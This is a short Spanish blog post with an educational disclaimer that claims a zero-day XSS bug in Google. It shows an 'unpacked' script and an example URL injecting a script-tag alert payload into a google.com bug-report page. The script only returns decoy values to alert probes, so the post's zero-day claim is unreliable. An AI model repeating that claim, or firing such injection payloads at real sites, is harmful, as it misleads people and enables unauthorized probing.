O-DAY Google XSS

"Toda la información proporcionada son para fines educativos.En ningún caso alguno se hace responsable de cualquier mal uso de la información.Toda la información son para el desarrollo de la Hacker Defensa entre los usuarios y ayudar a prevenir los ataques de hackers. GSICR insiste en que esta información NO debe ser utilizada para causar ningún tipo de daño, directa o indirectamente"

Compartiendo un ZERO DAY BUG de google, aplicando la técnica xss


unpacked:
if (location.href.match(/alert\(['"]xss['"]\)/)) alert('excesses');
else if (location.href.match(/alert\([0-9]/)) alert(42);
else if (location.href.match(/alert\(document.domain/)) alert('127.0.0.1');
else if (location.href.match(/alert\(document.cookie/)) location.href = 'gsi0.com';

example:
https://www.google.com/appserve/security-bugs/new?rl=<script>alert(6);</script>


-- James Jara

0 pensamientos:

Post a Comment

feedback!